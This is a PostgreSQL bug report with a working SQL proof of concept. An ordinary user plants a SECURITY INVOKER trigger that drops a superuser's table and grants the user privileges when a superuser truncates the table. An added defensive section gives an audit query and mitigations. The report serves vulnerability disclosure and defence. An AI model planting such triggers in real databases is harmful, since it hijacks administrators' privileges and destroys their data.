BUG #13651: trigger security invoker attack

From: digoal(at)126(dot)com
To: pgsql-bugs(at)postgresql(dot)org
Subject: BUG #13651: trigger security invoker attack
Date: 2015-09-29 11:57:37
Message-ID: 20150929115737.1448.91255@wrigleys.postgresql.org
Lists: pgsql-bugs

The following bug has been logged on the website:

Bug reference: 13651
Logged by: digoal
Email address: digoal(at)126(dot)com
PostgreSQL version: 9.4.4
Operating system: CentOS 6.x x64
Description:

In my database there are two roles: one normal user and one superuser.

postgres=# \dt
            List of relations
 Schema |       Name       | Type  |  Owner
--------+------------------+-------+----------
 public | customer_reviews | table | postgres
 public | t                | table | digoal
 public | t1               | table | postgres
 public | t2               | table | postgres
 public | t3               | table | postgres

I can use the normal user to create a table, and then create a trigger; in
the trigger I drop the superuser's table and grant all privileges to the normal user.
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> create table temp_table (id int);
CREATE TABLE

postgres=> create or replace function tg1() returns trigger as $$
declare
begin
drop table t1 cascade;
grant all on table t2 to digoal;
return null;
end;
$$ language plpgsql security invoker;
CREATE FUNCTION

postgres=> create trigger tg2 before truncate on temp_table for each statement execute procedure tg1();
CREATE TRIGGER

When a superuser truncates the temp table,
the trigger will execute, dropping the superuser's table t1 and granting t2.
postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".

postgres=# truncate temp_table ;
NOTICE: 00000: drop cascades to rule r1 on table t
CONTEXT: SQL statement "drop table t1 cascade"
PL/pgSQL function tg1() line 4 at SQL statement
LOCATION: reportDependentObjects, dependency.c:996
TRUNCATE TABLE

postgres=# \dp+ t2
                                  Access privileges
 Schema | Name | Type  |     Access privileges      | Column access privileges
--------+------+-------+----------------------------+--------------------------
 public | t2   | table | postgres=arwdDxt/postgres +|
        |      |       | digoal=arwdDxt/postgres    |
(1 row)

And the rule is secure.
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> create rule r1 as on delete to t do instead delete from t1;
CREATE RULE
postgres=> delete from t;
ERROR: permission denied for relation t1

postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# \set VERBOSITY verbose
postgres=# delete from t;
ERROR: 42501: permission denied for relation t1
LOCATION: aclcheck_error, aclchk.c:3371
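Added example, not part of the original report: a defender-side SQL check a DBA can run before truncating or otherwise modifying a table owned by another role. The first statement lists every enabled, non-internal trigger on tables the current user does not own, together with the trigger function's owner, its SECURITY mode and its body, so a superuser can see what would execute with superuser privileges. The two blocks after it show ways to run the statement without lending superuser rights to the trigger body. The role and table names (digoal, temp_table) are taken from the report; the catalog columns and functions are standard PostgreSQL (9.4 and later), and everything else is assumed.

```sql
-- 1. Inventory: which triggers would fire with MY privileges on tables I do not own?
--    Trigger functions in "invoker" mode execute as the user issuing the statement,
--    so their bodies (pg_get_functiondef) deserve a look before TRUNCATE/DELETE/UPDATE.
SELECT n.nspname                                   AS schema,
       c.relname                                   AS table_name,
       pg_get_userbyid(c.relowner)                 AS table_owner,
       t.tgname                                    AS trigger_name,
       p.proname                                   AS function_name,
       pg_get_userbyid(p.proowner)                 AS function_owner,
       CASE WHEN p.prosecdef THEN 'definer' ELSE 'invoker' END AS security_mode,
       t.tgenabled                                 AS enabled,       -- 'O' = fires normally
       pg_get_triggerdef(t.oid)                    AS trigger_def,
       pg_get_functiondef(p.oid)                   AS function_body
FROM   pg_trigger   t
JOIN   pg_class     c ON c.oid = t.tgrelid
JOIN   pg_namespace n ON n.oid = c.relnamespace
JOIN   pg_proc      p ON p.oid = t.tgfoid
WHERE  NOT t.tgisinternal                          -- skip FK / constraint machinery
  AND  t.tgenabled <> 'D'                          -- skip disabled triggers
  AND  c.relowner <> (SELECT oid FROM pg_roles WHERE rolname = current_user)
ORDER  BY 1, 2, 4;

-- 2a. Mitigation: run the statement as the table owner, so a SECURITY INVOKER
--     trigger body gets the owner's privileges rather than the superuser's.
--     In the reported scenario, "drop table t1 cascade" inside tg1() would then
--     fail, because digoal is not the owner of t1.
BEGIN;
SET LOCAL ROLE digoal;          -- a superuser may SET ROLE to any role
TRUNCATE temp_table;            -- allowed: digoal owns temp_table
COMMIT;                         -- SET LOCAL ends with the transaction

-- 2b. Mitigation: stay superuser but keep ordinary triggers from firing at all
--     for this transaction. Caveat: this also silences foreign-key enforcement
--     triggers, so reserve it for maintenance whose side effects are understood.
BEGIN;
SET LOCAL session_replication_role = replica;   -- only ENABLE REPLICA/ALWAYS triggers fire
TRUNCATE temp_table;
COMMIT;
```

The inventory query is the part worth scripting: run it as the privileged role and review any row whose security_mode is "invoker" and whose function_owner differs from table_owner or from yourself, since that is exactly the shape of the report above (a trigger written by one role, fired with another role's rights).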
